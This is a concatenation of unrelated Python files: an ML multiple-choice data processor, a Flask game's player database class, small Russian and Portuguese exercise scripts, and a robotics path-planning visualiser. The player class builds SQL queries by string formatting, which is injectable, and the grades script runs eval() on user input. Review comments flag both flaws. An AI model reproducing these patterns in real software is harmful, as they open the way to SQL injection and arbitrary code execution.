        return self._create_examples(self._read_lines(test_filename), answers=None, type="test")

    def get_labels(self):
        """See base class."""
        return ["0", "1"]

    def _read_lines(self, input_file):
        with open(input_file, "r", encoding="utf-8") as fin:
            lines = fin.readlines()
        return lines

    def _create_examples(self, lines, answers=None, type=None):
        """Creates examples for the training and dev sets."""
        examples = []
        if answers:
            # Labeled split: pair each jsonl line with its answer line.
            for i, (line, ans) in enumerate(zip(lines, answers)):
                data_raw = json.loads(line.strip("\n"))
                ans = ans.strip("\n")
                truth = str(ans)
                id = i
                if 'retrieved_text' in data_raw.keys():
                    # Concatenate retrieved evidence into the context; use
                    # a placeholder when retrieval returned nothing.
                    context = ' '.join([i for i in data_raw['retrieved_text']])
                    if len(context) == 0:
                        context = 'placeholder'
                    examples.append(
                        InputExample(
                            example_id=id,
                            question="",
                            contexts=['Q: '+data_raw['goal']+' '+context, 'Q: '+data_raw['goal']+' '+context],
                            endings=['A: '+data_raw['sol1'], 'A: '+data_raw['sol2']],
                            label=truth,
                        )
                    )
                else:  # baseline
                    examples.append(
                        InputExample(
                            example_id=id,
                            question="",
                            contexts=['Q: '+data_raw['goal'], 'Q: '+data_raw['goal']],
                            endings=['A: '+data_raw['sol1'], 'A: '+data_raw['sol2']],
                            label=truth,
                        )
                    )
        # NOTE test with no answer; may be buggy
        else:
            for i, line in enumerate(lines):
                data_raw = json.loads(line.strip("\n"))
                id = i
                examples.append(
                    InputExample(
                        example_id=id,
                        question="",
                        contexts=['Q: '+data_raw['goal'], 'Q: '+data_raw['goal']],
                        endings=['A: '+data_raw['sol1'], 'A: '+data_raw['sol2']],
                    )
                )
        if type == "train":
            assert len(examples) > 1
            assert examples[0].label is not None
        logger.info("len examples: %s}", str(len(examples)))
        return examples
class TemporalDataset(Dataset):
    """Dataset over parallel sequences; indexing returns one tuple drawn
    from the same position of every stored sequence."""

    def __init__(self, *tensors):
        # Unlike TensorDataset, no equal-length check is enforced here.
        self.tensors = tensors

    def __getitem__(self, index):
        items = []
        for tensor in self.tensors:
            items.append(tensor[index])
        return tuple(items)

    def __len__(self):
        # Length of the first sequence; len() works for lists as well as
        # tensors (unlike .size(0)).
        return len(self.tensors[0])
def convert_examples_to_features(
    examples: List[InputExample],
    label_list: List[str],
    max_length: int,
    task_name: str,
    tokenizer: PreTrainedTokenizer,
    pad_token_segment_id=0,
    pad_on_left=False,
    pad_token=0,
    mask_padding_with_zero=True,
) -> List[InputFeatures]:
    """
    Loads a data file into a list of `InputFeatures`.

    Each example yields one (input_ids, attention_mask, token_type_ids)
    triple per answer choice, each padded/truncated to `max_length`.
    For task_name == 'mctaco-bce' the example label is a list and is
    mapped element-wise; otherwise it is a single label id.
    """
    label_map = {label: i for i, label in enumerate(label_list)}
    len_dict = Counter()  # histogram of pre-padding lengths (debug aid)
    features = []
    for (ex_index, example) in tqdm.tqdm(enumerate(examples), desc="convert examples to features"):
        if ex_index % 10000 == 0:
            logger.info("Writing example %d of %d" % (ex_index, len(examples)))
        choices_features = []
        for ending_idx, (context, ending) in enumerate(zip(example.contexts, example.endings)):
            # Tokenize the ending first so the context can be budgeted
            # into the remaining room of max_length.
            inputs = tokenizer.encode_plus(ending, add_special_tokens=True, max_length=max_length)
            try:
                inputs_a = tokenizer.encode_plus(context, add_special_tokens=True, max_length=max_length-len(inputs['input_ids'])+1)
                # Join context + ending, dropping the ending's leading
                # special token; segment id 1 marks the ending tokens.
                input_ids, token_type_ids = inputs_a['input_ids']+inputs['input_ids'][1:], inputs_a['token_type_ids']+[1]*(len(inputs['token_type_ids'])-1)
            except:
                # NOTE(review): bare except -- presumably catches the
                # tokenizer rejecting a non-positive max_length when the
                # ending alone fills the budget; narrow the clause.
                print (ex_index)
                inputs_a = tokenizer.encode_plus(context, add_special_tokens=True, max_length=max_length)
                tmp_a, tmp_b, _ = tokenizer.truncate_sequences(inputs_a['input_ids'][:-1], pair_ids=inputs['input_ids'][1:-1], num_tokens_to_remove=len(inputs_a['input_ids'])+len(inputs['input_ids'])-max_length-1)
                input_ids = tmp_a+[tokenizer.sep_token_id]+tmp_b+[tokenizer.sep_token_id]
                token_type_ids = [0]*(len(tmp_a)+1)+[1]*(len(tmp_b)+1)
            if "num_truncated_tokens" in inputs and inputs["num_truncated_tokens"] > 0:
                logger.info(
                    "Attention! you are cropping tokens (swag task is ok). "
                    "If you are training ARC and RACE and you are poping question + options,"
                    "you need to try to use a bigger max seq length!"
                )
            # The mask has 1 for real tokens and 0 for padding tokens. Only real
            # tokens are attended to.
            attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
            len_dict[len(input_ids)] += 1
            # Zero-pad up to the sequence length.
            padding_length = max_length - len(input_ids)
            if pad_on_left:
                input_ids = ([pad_token] * padding_length) + input_ids
                attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
                token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
            else:
                input_ids = input_ids + ([pad_token] * padding_length)
                attention_mask = attention_mask + ([0 if mask_padding_with_zero else 1] * padding_length)
                token_type_ids = token_type_ids + ([pad_token_segment_id] * padding_length)
            assert len(input_ids) == max_length
            assert len(attention_mask) == max_length
            assert len(token_type_ids) == max_length
            choices_features.append((input_ids, attention_mask, token_type_ids))
        # NOTE: modified for mctaco bce
        if task_name == 'mctaco-bce':
            # Multi-label task: example.label is a list of label strings.
            label = [label_map[i] for i in example.label]
        else:
            label = label_map[example.label]
        if ex_index < 2:
            # Log the first two examples in full for sanity checking.
            logger.info("*** Example ***")
            logger.info("race_id: {}".format(example.example_id))
            for choice_idx, (input_ids, attention_mask, token_type_ids) in enumerate(choices_features):
                logger.info("choice: {}".format(choice_idx))
                logger.info("input_ids: {}".format(" ".join(map(str, input_ids))))
                tokens = tokenizer.convert_ids_to_tokens(input_ids)
                logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
                logger.info("attention_mask: {}".format(" ".join(map(str, attention_mask))))
                logger.info("token_type_ids: {}".format(" ".join(map(str, token_type_ids))))
                logger.info("label: {}".format(label))
        features.append(InputFeatures(example_id=example.example_id, choices_features=choices_features, label=label,))
    return features
# Registry mapping task name -> processor class.
processors = {"race": RaceProcessor, "swag": SwagProcessor, "arc": ArcProcessor, "piqa": PiqaProcessor, "mctaco-bce": TemporalProcessorForBCE, "mctaco": TemporalProcessor}
# Number of answer choices per task.  Fixed: this was written with commas
# instead of colons, which built the set {"race", 4, "swag", "arc"} rather
# than the intended mapping, so any `[task]` lookup raised TypeError.
# Also registered the two-label temporal tasks for consistency with
# `processors` (their get_labels() return ["yes", "no"]).
MULTIPLE_CHOICE_TASKS_NUM_LABELS = {
    "race": 4,
    "swag": 4,
    "arc": 4,
    "piqa": 2,
    "mctaco-bce": 2,
    "mctaco": 2,
}
import re
from flask import session
from app.lib.coins import Coin
from app import app, db
from passlib.hash import pbkdf2_sha256
class Players:
    """Collection-level helpers for player records in the DB."""

    # Starting balance granted to every newly registered player.
    __initial_balance = app.config['INITIAL_BALANCE']

    def __init__(self):
        pass

    @staticmethod
    def exists(username):
        """Return True when a row with this username exists."""
        # NOTE(review): interpolating `username` into the WHERE clause is
        # SQL-injectable; switch to the db layer's parameter binding.
        res = db.select('players', where="username='{}'".
                        format(username), limit=1)
        return hasattr(res, 'id')

    @staticmethod
    def get_player(id=0, username=''):
        """Fetch one player by id (preferred) or username; None if absent."""
        where = "id='{}'".format(id) if id != 0\
            else "username='{}'".format(username)
        result = db.select('players', where=where, limit=1)
        if not result:
            return None
        return Player(result.id, result.username,
                      result.password, result.balance)

    @staticmethod
    def register_player(player):
        """Register the player in the DB if valid, then sign them in.

        Raises ValidationError when the username is taken.
        """
        if not isinstance(player, Player):
            raise Exception('Invalid type supplied')
        if Players.exists(player.username):
            raise ValidationError('Username ' + player.username + ' exists')
        fields = ('username', 'balance')
        values = (player.username, Players.__initial_balance)
        if hasattr(player, 'password'):
            # Fixed: ('password') is just a parenthesized string, so the
            # old `fields + ('password')` raised TypeError (tuple + str).
            # One-element tuples need the trailing comma.
            # NOTE(review): Player stores the password as the name-mangled
            # `_Player__password` attribute, so hasattr(player, 'password')
            # appears to be always False here -- confirm intent.
            fields = fields + ('password',)
            values = values + (player.password,)
        db.insert('players', fields, values)
        registered = Players.get_player(username=player.username)
        registered.sign_in()
class Player:
    """A single player: credentials, balance, and betting statistics."""

    def __init__(self, id=0, username='', password='', balance=0):
        self.username = username
        self.id = id
        self.__password = password  # pbkdf2_sha256 hash, not plaintext
        self.balance = balance

    def __password_matches(self, pwd_to_check):
        """Return True when `pwd_to_check` verifies against the stored hash."""
        # rounds = app.config['PASS_ROUNDS']
        # hash = pbkdf2_sha256.encrypt("password", rounds=rounds)
        return pbkdf2_sha256.verify(pwd_to_check, self.__password)

    def validate_username(self):
        """Raise ValidationError unless the username is 6-16 word characters."""
        if not hasattr(self, 'username') or\
                self.username == '':
            raise ValidationError('No username')
        elif len(self.username) > 16:
            raise ValidationError('Login cannot be more than 16 chars')
        elif len(self.username) < 6:
            raise ValidationError('Login cannot be less than 6 chars')
        elif not re.match("^[A-Za-z0-9_]*$", self.username):
            raise ValidationError('Invalid characters')

    def validate_password(self):
        # Intentionally a no-op for now.
        pass

    def sign_in(self):
        """Validate the username and store the player's id in the session.

        Raises ValidationError when the username does not exist.
        Fixed: the original rebound the local name `self`, which only
        shadowed the argument and never "invalidated" the instance as its
        docstring claimed; a separate local makes the intent clear while
        preserving behavior.
        """
        self.validate_username()
        player = Players.get_player(username=self.username)
        if player is not None:
            session['pid'] = player.id
        else:
            raise ValidationError("Username doesnt exist")

    def commit_bet(self, bet, balance_change):
        """Apply a settled bet to this player's DB row (balance + stats)."""
        if bet.player_id != self.id:
            raise Exception("Player id doesnt match with bets player id")
        won = bet.outcome == bet.bet_on
        # NOTE(review): these SQL expression fragments interpolate values
        # directly; safe only while amounts are numeric -- prefer binding.
        changes = {}
        changes['balance'] = "balance + ({})".format(str(balance_change))
        changes['number_of_bets'] = "number_of_bets + 1"
        changes['wagered'] = "wagered + {}".format(bet.amount)
        if won:
            changes['number_of_bets_won'] = "number_of_bets_won + 1"
        where = "id = {}".format(self.id)
        db.update('players', changes, where)
class ValidationError(Exception):
    """Raised when player-supplied input fails validation."""
|
# cars = ['mazda', 'volvo', 'bmw']
# cars.append('jigul')
# del cars[-1]
# print(cars[-1].title())
# ---
# cars = ['mazda', 'volvo', 'bmw']
# cars.append('jigul')
# cars.remove('jigul')
# print(cars[-1].title())
#---
# cars = ['mazda', 'volvo', 'bmw']
# cars.append('jigul')
# cars.sort()
# cars.reverse()
# print(cars)
# ---
# Family budget calculator: read each member's name and income, a loan's
# amount/term/rate, then print how much each member can spend per month.
names = []
salarys= []
amount = 0
amount_of_members = input('Введите количество членов семьи: ')
aom = int(amount_of_members)
# Collect one name per family member.
for i in range(aom):
    names.append(input('Имя ' + str(i+1) + ' человека:\n'))
# Collect one income per family member.
for i in range(aom):
    salarys.append(input("Доход "+ str(i+1) + ' человека:\n'))
credit = input('введите сумму кредита :')
how_long = input('на какой срок кредит в месяцах :')
procent = input('введите процент :')
# Monthly payment = principal/term + (yearly simple interest)/12.
# NOTE(review): the interest term ignores the loan term length — confirm
# this simplified formula is intended.
pay_per_mounth = (int(credit) / int(how_long)) + ((int(credit) / 100 * int(procent)) / 12)
print('Месячный платеж', pay_per_mounth)
# Sum the family's total income.
for salary in salarys:
    amount += int(salary)
# amount -= pay_per_mounth
# Disposable income per member after the monthly loan payment.
mean = (amount - pay_per_mounth) / aom
mean = str(mean)
for name in names:
    print(name.title() + " может потратить" + mean)
|
from numpy import *  # imports the numpy namespace for array handling
# Reads a list of grades and, while more than one grade is entered, prints
# how many students passed (grade >= 5) without qualifying as monitors
# (grade >= 7), then asks again.
medias = array(eval(input("Digite as notas dos estudantes: ")))  # read the students' grades
# NOTE(review): eval() on raw input executes arbitrary code — unsafe for
# untrusted input; ast.literal_eval would be the safe alternative.
while(size(medias) > 1):  # repeat the question while more than one grade is given
    aprovado = 0  # counter of passing students, grade >= 5
    mon = 0  # counter of monitor candidates, grade >= 7
    for nota in medias:  # iterate over the grades directly, not over indices
        if(nota >= 5):  # did this grade pass the student?
            aprovado = aprovado + 1  # if so, increment the pass counter
        if(nota >= 7):  # is the student eligible to be a monitor?
            mon = mon+1  # if so, increment the monitor counter
    print(aprovado-mon)  # the difference counts passes that are not monitors
    medias = array(eval(input("Digite as notas dos estudantes: ")))  # read again
|
from time import time
import glm
from itbl import Ray, Shader
from itbl.accelerators import SDF, BVHAccel
from itbl.cameras import TrackballCamera
from itbl.shapes import Box
from itbl.util import get_color, get_data
from itbl.viewer import Application, Viewer
from itbl.viewer.backend import *
from wilson import *
import itbl._itbl as _itbl
import time
from kinorrt.search_space import SearchSpace
from kinorrt.mechanics.contact_kinematics import *
import random
from kinorrt.mechanics.stability_margin import *
from kinorrt.rrt import RRTManipulation
import plotly.graph_objects as go
class iTM2d(Application):
    """2D interactive viewer for the kinorrt manipulation-planning demos.

    Renders the manipulated object and obstacle scene with OpenGL, and can
    step through a planned trajectory, draw the whole path, or draw all
    search-tree nodes, toggled by key presses (see on_key_press2).
    """

    def __init__(self, object_shape, example='sofa'):
        # Initialize scene.
        super(iTM2d, self).__init__(None)
        self.mesh = Box(1.0, 0.5, 0.2)
        self.light_box = Box(0.2, 0.2, 0.2)
        self.example = example
        self.object_shape = object_shape

    def init(self):
        """Compile the 3D shaders and set up the trackball camera."""
        super(iTM2d, self).init()
        # Basic lighting shader.
        vertex_source = os.path.join(get_data(), 'shader', 'basic_lighting.vs')
        fragment_source = os.path.join(get_data(), 'shader', 'basic_lighting.fs')
        self.basic_lighting_shader = Shader(vertex_source, fragment_source)
        # Lamp shader.
        vertex_source = os.path.join(get_data(), 'shader', 'flat.vs')
        fragment_source = os.path.join(get_data(), 'shader', 'flat.fs')
        self.lamp_shader = Shader(vertex_source, fragment_source)
        # Normal shader.
        vertex_source = os.path.join(get_data(), 'shader', 'normals.vs')
        fragment_source = os.path.join(get_data(), 'shader', 'normals.fs')
        geometry_source = os.path.join(get_data(), 'shader', 'normals.gs')
        self.normal_shader = Shader(vertex_source, fragment_source, geometry_source)
        # Trackball camera.
        self.camera = TrackballCamera(radius=50)
        # Toggle variables.
        self.draw_mesh = True
        self.draw_wireframe = True
        self.draw_normals = False

    def init2(self):
        """Set up the 2D shader, the target object and the obstacle scene."""
        # C++ OpenGL.
        _itbl.loadOpenGL()
        # 2D shader.
        vertex_source = os.path.join(get_data(), 'shader', '2d.vs')
        fragment_source = os.path.join(get_data(), 'shader', '2d.fs')
        self.flat_shader = Shader(vertex_source, fragment_source)
        # Object
        self.env_contacts = None
        self.manip_contacts = None
        self.env_contacts = None  # NOTE(review): duplicate of the assignment two lines up
        self.manifold = None
        self.v_m = None
        self.counter = 0
        self.target = _itbl.Rectangle(self.object_shape[0] * 2, self.object_shape[1] * 2, 2, 0.0)
        # Choose the obstacle layout for the requested example scene.
        if self.example == 'sofa':
            self.collision_manager = create_hallway(HALLWAY_W, BLOCK_W, BLOCK_H, self.object_shape[
                0] * 2.5 + BLOCK_W * 0.5)  # uniform_sample_maze((4,4), 3, 1.25)
        elif self.example == 'maze':
            self.collision_manager = uniform_sample_maze((3, 3), 3, 1.25)
        elif self.example == 'corner':
            self.collision_manager = corner()
        elif self.example == 'wall':
            self.collision_manager = wall()
        elif self.example == 'table':
            # NOTE(review): 'table' reuses the 'corner' scene — confirm intended.
            self.collision_manager = corner()
        elif self.example == 'obstacle_course':
            self.collision_manager = obstacle_course()
        elif self.example == 'peg-in-hole-v':
            self.collision_manager = peg_in_hole_v()
        elif self.example == 'peg-in-hole-p':
            self.collision_manager = peg_in_hole_p()
        elif self.example == 'book':
            self.collision_manager = book()
        elif self.example == 'unpacking':
            self.collision_manager = unpacking()
        else:
            print('Cannot find collision manager!')
            # NOTE(review): a bare `raise` outside an except block raises
            # RuntimeError("No active exception to re-raise"); probably a
            # specific exception type was intended here.
            raise
        # Visualization toggles and trajectory-stepping state.
        self.all_configs_on = False
        self.step_on = False
        self.path_on = False
        self.manip_p = None
        self.next_manip_p = None

    def draw_manifold(self):
        """Draw the contact points and penetration segments of the current
        contact manifold, if one is set."""
        if self.manifold is None:
            return
        glPointSize(5)
        manifold = self.manifold
        for i in range(len(manifold.depths)):
            glBegin(GL_POINTS)
            cp = manifold.contact_points[i]
            glVertex3f(cp[0], cp[1], 1)
            glEnd()
            glBegin(GL_LINES)
            d = manifold.depths[i]
            n = manifold.normals[i]
            # Segment from the contact point along -normal, scaled by depth.
            cq = cp - d * n
            glVertex3f(cp[0], cp[1], 1)
            glVertex3f(cq[0], cq[1], 1)
            glEnd()

    def draw_ground(self):
        """Draw a ground line at y=0 with hatch marks below it."""
        glBegin(GL_LINES)
        # ground line
        glVertex3f(-10, 0, -1)
        glVertex3f(10, 0, -1)
        # hashes
        for x in np.arange(-10, 10, 0.1):
            glVertex3f(x, 0, -1)
            glVertex3f(x - 0.1, -0.1, -1)
        glEnd()

    def draw_grid(self, size, step):
        """Draw a square grid of half-extent *size* with spacing *step*,
        plus highlighted x and z axes."""
        glBegin(GL_LINES)
        glColor3f(0.3, 0.3, 0.3)
        for i in np.arange(step, size, step):
            glVertex3f(-size, i, 0)  # lines parallel to X-axis
            glVertex3f(size, i, 0)
            glVertex3f(-size, -i, 0)  # lines parallel to X-axis
            glVertex3f(size, -i, 0)
            glVertex3f(i, -size, 0)  # lines parallel to Z-axis
            glVertex3f(i, size, 0)
            glVertex3f(-i, -size, 0)  # lines parallel to Z-axis
            glVertex3f(-i, size, 0)
        # x-axis
        glColor3f(0.5, 0, 0)
        glVertex3f(-size, 0, 0)
        glVertex3f(size, 0, 0)
        # z-axis
        glColor3f(0, 0, 0.5)
        glVertex3f(0, -size, 0)
        glVertex3f(0, size, 0)
        glEnd()

    def render(self):
        """Render the 3D scene: obstacles, target object, optional normals
        and wireframe overlay, and the light."""
        glClearColor(0.2, 0.3, 0.3, 1.0)
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glEnable(GL_DEPTH_TEST)
        glEnable(GL_MULTISAMPLE)
        glEnable(GL_BLEND)
        # glEnable(GL_CULL_FACE)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
        self.basic_lighting_shader.use()
        print_opengl_error()
        model = glm.mat4(1.0)
        self.basic_lighting_shader.set_mat4('model', np.asarray(model))
        view = self.camera.get_view()
        self.basic_lighting_shader.set_mat4('view', np.asarray(view))
        projection = glm.perspective(glm.radians(45.0), 1200. / 900, 0.1, 100.0)
        self.basic_lighting_shader.set_mat4('projection', np.asarray(projection))
        # colors
        # self.basic_lighting_shader.set_vec3('objectColor', np.array([1.0, 0.5, 0.31], 'f'))
        self.basic_lighting_shader.set_vec3('lightColor', np.array([1.0, 1.0, 1.0], 'f'))
        # light
        lightPos = glm.vec3([1.00, 1.75, 10.0])
        self.basic_lighting_shader.set_vec3('lightPos', np.asarray(lightPos))
        # camera
        cameraPos = glm.vec3(glm.column(glm.inverse(view), 3))
        self.basic_lighting_shader.set_vec3('viewPos', np.asarray(cameraPos))
        # Draw object.
        if self.draw_mesh:
            # Draw obstacles.
            self.basic_lighting_shader.set_vec3('objectColor', get_color('gray'))
            self.collision_manager.draw(self.basic_lighting_shader.id, True, True)
            # Draw object.
            self.basic_lighting_shader.set_vec3('objectColor', get_color('clay'))
            self.target.draw3d(self.basic_lighting_shader.id)
        # Draw normals.
        self.normal_shader.use()
        self.normal_shader.set_mat4('model', np.asarray(model))
        self.normal_shader.set_mat4('view', np.asarray(view))
        self.normal_shader.set_mat4('projection', np.asarray(projection))
        if self.draw_normals:
            self.mesh.draw(self.normal_shader)
        # Draw edges and light.
        self.lamp_shader.use()
        self.lamp_shader.set_mat4('model', np.asarray(model))
        self.lamp_shader.set_mat4('view', np.asarray(view))
        self.lamp_shader.set_mat4('projection', np.asarray(projection))
        self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
        glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
        if self.draw_wireframe:
            # Draw object.
            self.target.draw3d(self.lamp_shader.id)
        glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
        light_model = glm.mat4(1.0)
        light_model = glm.translate(light_model, lightPos)
        self.lamp_shader.set_mat4('model', np.asarray(light_model))
        # self.light_box.draw(self.lamp_shader)
        self.lamp_shader.set_mat4('model', np.asarray(model))
        self.lamp_shader.set_vec3('objectColor', get_color('teal'))
        model = glm.mat4(1.0)
        self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
        self.lamp_shader.set_mat4('model', np.asarray(model))
        # self.draw_grid(5, 0.25)

    def render2(self):
        """Render the 2D scene: obstacles plus, depending on the toggles,
        the stepped trajectory animation, the whole path, or all nodes."""
        glClearColor(0.2, 0.3, 0.3, 1.0)
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glEnable(GL_DEPTH_TEST)
        glEnable(GL_MULTISAMPLE)
        # glEnable(GL_BLEND)
        # glEnable(GL_CULL_FACE)
        # glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
        # glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
        self.flat_shader.use()
        model = glm.mat4(1.0)
        self.flat_shader.set_mat4('model', np.asarray(model))
        view = glm.mat4(1.0)
        self.flat_shader.set_mat4('view', np.asarray(view))
        aspect_ratio = 800. / 600.
        d = 10
        ortho = glm.ortho(-d * aspect_ratio, d * aspect_ratio, -d, d, -100.0, 100.0)
        # ortho = glm.ortho(-2*aspect_ratio, 2*aspect_ratio, -2, 2, -100.0, 100.0)
        self.flat_shader.set_mat4('projection', np.asarray(ortho))
        self.flat_shader.set_vec3('offset', np.zeros((3, 1), 'float32'))
        self.flat_shader.set_float('scale', 1.0)
        self.flat_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
        # self.draw_grid(5, 0.25)
        # Draw obstacles.
        self.flat_shader.set_vec3('objectColor', get_color('gray'))
        self.collision_manager.draw(self.flat_shader.id, True, False)
        if self.step_on:
            # Step the animation: one path configuration per rendered frame.
            new_m = point_manipulator()
            if self.counter >= len(self.path):
                self.counter = 0  # loop the animation from the start
            self.config = self.path[self.counter]
            self.manip_p = self.mnp_path[self.counter]
            if self.manip_p is not None:
                # Draw each manipulator contact point in red.
                for mnp in self.manip_p:
                    p = mnp.p
                    p = p[0:2]
                    new_m.update_config(np.array(p),self.config)
                    self.flat_shader.set_vec3('objectColor', get_color('red'))
                    new_m.obj.draw2d(self.flat_shader.id, True)
            self.flat_shader.set_vec3('objectColor', get_color('clay'))
            # Embed the planar pose into a 4x4 homogeneous transform.
            T2 = config2trans(np.array(self.config))
            T3 = np.identity(4)
            T3[0:2, 3] = T2[0:2, 2]
            T3[0:2, 0:2] = T2[0:2, 0:2]
            self.target.transform()[:, :] = T3
            self.target.draw2d(self.flat_shader.id, True)
            # print(self.counter, len(self.path))
            time.sleep(0.07)  # throttle the animation speed
            self.counter += 1
        if self.path_on:
            glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
            # Draw every configuration along the path as a wireframe.
            for i in range(len(self.path)):
                self.flat_shader.set_vec3('objectColor', get_color('clay'))
                target_config = self.path[i]
                T2 = config2trans(np.array(target_config))
                T3 = np.identity(4)
                T3[0:2, 3] = T2[0:2, 2]
                T3[0:2, 0:2] = T2[0:2, 0:2]
                self.target.transform()[:, :] = T3
                self.target.draw2d(self.flat_shader.id, True)
        if self.all_configs_on:
            glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
            # show all nodes
            for node in self.nodes:
                self.flat_shader.set_vec3('objectColor', get_color('clay'))
                target_config = np.array(node)
                T2 = config2trans(target_config)
                T3 = np.identity(4)
                T3[0:2, 3] = T2[0:2, 2]
                T3[0:2, 0:2] = T2[0:2, 0:2]
                self.target.transform()[:, :] = T3
                self.target.draw2d(self.flat_shader.id, True)

    def on_key_press2(self, key, scancode, action, mods):
        """Key bindings: C clears all toggles, T animates the path,
        A shows all tree nodes, P shows the whole path."""
        if key == glfw.KEY_C and action == glfw.PRESS:
            self.step_on = False
            self.path_on = False
            self.all_configs_on = False
        if key == glfw.KEY_T and action == glfw.PRESS:
            self.step_on = True
        if key == glfw.KEY_A and action == glfw.PRESS:
            self.all_configs_on = True
        if key == glfw.KEY_P and action == glfw.PRESS:
            self.path_on = True

    def on_key_press(self, key, scancode, action, mods):
        # 3D-view key handler intentionally does nothing.
        pass

    # def on_mouse_press(self, x, y, button, modifiers):
    #     pass
    # def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
    #     pass
    def on_mouse_press(self, x, y, button, modifiers):
        """Start a camera roll (left button) or zoom (right button)."""
        # Normalize window coordinates to [-1, 1].
        x = 2.0 * (x / 800.0) - 1.0
        y = 2.0 * (y / 600.0) - 1.0
        if button == 1:  # left click
            self.camera.mouse_roll(x, y, False)
        if button == 4:  # right click
            self.camera.mouse_zoom(x, y, False)

    def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
        """Continue the roll/zoom gesture while dragging."""
        x = 2.0 * (x / 800.0) - 1.0
        y = 2.0 * (y / 600.0) - 1.0
        if buttons == 1:  # left click
            self.camera.mouse_roll(x, y)
        if buttons == 4:  # right click
            self.camera.mouse_zoom(x, y)

    def get_path(self, path, mnp_path):
        # Store the planned configuration path and matching manipulator contacts.
        self.path = path
        self.mnp_path = mnp_path

    def get_nodes(self, nodes):
        # Store all search-tree nodes for the 'A' visualization toggle.
        self.nodes = nodes

    def get_tree(self, tree):
        # Store the search tree itself.
        self.tree = tree
# Experiment script: forward-integrate two trajectories for the 'book'
# example and plot them in (x, theta, y) space against a sampled boundary
# of the contact manifold.
object_shape = [1, 0.2, 0.2, 0.2]
X_dimensions = np.array([(-4.5, 4.5), (2, 3.5), (-2 * np.pi, 2 * np.pi)])  # (x, y, theta) search bounds
x_init = (0, 2.2, 0)
x_goal = (0, 3, -np.pi / 2)
world_key = 'vert'
dist_weight = 1
mnp_fn_max = 6
goal_kch = [0.01, 0.1, 1]
allow_contact_edges = [True, False, True, False]
viewer = Viewer()
_itbl.loadOpenGL()
manipulator = doublepoint_manipulator()
mnp_fn_max = None  # NOTE(review): overwrites the 6 assigned above — confirm intended
step_length = 2
neighbor_r = 5
dist_cost = 1
app = iTM2d(object_shape, example='book')
viewer.set_renderer(app)
viewer.init()
X = SearchSpace(X_dimensions)
the_object = part(app.target, object_shape, allow_contact_edges)
rrt_tree = RRTManipulation(X, x_init, x_goal, environment(app.collision_manager), the_object, manipulator,
                           50, neighbor_r, world_key)
# Two sampled goal configurations, integrated from the same start state x
# with fixed manipulator contacts and a fixed contact-mode assignment.
x = (-2.3, 2.2, 0)
x_rand = (-2.5, 2.2, -np.pi)
x_rand1 = (-3,3.5,-np.pi/3)
_, envs = rrt_tree.check_collision(x)
mnps = [Contact((-0.8,0.2),(0,-1),0),Contact((-0.8,-0.2),(0,1),0)]
mode = [CONTACT_MODE.FOLLOWING,CONTACT_MODE.FOLLOWING,CONTACT_MODE.SLIDING_LEFT,CONTACT_MODE.LIFT_OFF]
x_new, path, _ = rrt_tree.forward_integration(x,x_rand,envs,mnps,mode)
path += [(-2.432,3,-np.pi/2)]
x_new, path1, _ = rrt_tree.forward_integration(x,x_rand1,envs,mnps,mode)
# NOTE(review): this appends to `path` again; `path1 += ...` was likely
# intended for the second trajectory — verify.
path += [(-2.432,3,-np.pi/2)]
print(x_new)
print(path)
fig = go.Figure()
# Sample the manifold boundary: an arc, the top edge, a reversed arc, and
# the bottom edge, concatenated into one polyline.
boundary = []
for theta in np.arange(0,np.pi/2,0.1):
    q = (-3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
    boundary += [q]
boundary += [(-2.8,3,-np.pi/2)]
for x0 in np.arange(-2.8,-1.1,0.1):
    boundary += [(x0,3,-np.pi/2)]
boundary += [(-1.1,3,-np.pi/2)]
b0 = []
for theta in np.arange(0,np.pi/2,0.1):
    q = (-1.3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
    b0 += [q]
b0.reverse()
boundary+=b0
for x0 in np.arange(-4,-2.3,0.1):
    boundary += [(x0,2.2,0)]
'''
x1, path1, _ = rrt_tree.forward_integration(x,(-4,2.2,0),envs,mnps,mode)
x2, path2, _ = rrt_tree.forward_integration(x,(-4,2.2,-np.pi/4),envs,mnps,mode)
x3, path3, _ = rrt_tree.forward_integration(x,(-3,2.6,-np.pi/3),envs,mnps,mode)
x4, path4, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi),envs,mnps,mode)
x5, path5, _ = rrt_tree.forward_integration(x,(-0.5,3,-np.pi),envs,mnps,mode)
x6, path6, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi/2.5),envs,mnps,mode)
x7, path7, _ = rrt_tree.forward_integration(x,(-2,3,-np.pi),envs,mnps,mode)
'''
# Unpack coordinates; note the y and z axes are swapped in the plot so the
# vertical plot axis shows y and the depth axis shows theta.
xb, yb, zb = np.array(boundary).T
#xs, ys, zs = np.array(boundary + path+path1+path2+path3+path4+path5+path6+path7).T
x,y,z = np.array(path).T
x1,y1,z1 = np.array(path1).T
fig = go.Figure()
fig.add_trace(go.Scatter3d(x=xb, y=zb, z=yb, mode='lines', line={'width':8, 'color':'blue'},name='Manifold Boundary'))
# fig.add_trace(go.Scatter3d(x=xs, y=ys, z=zs, mode='markers', opacity=0.50))
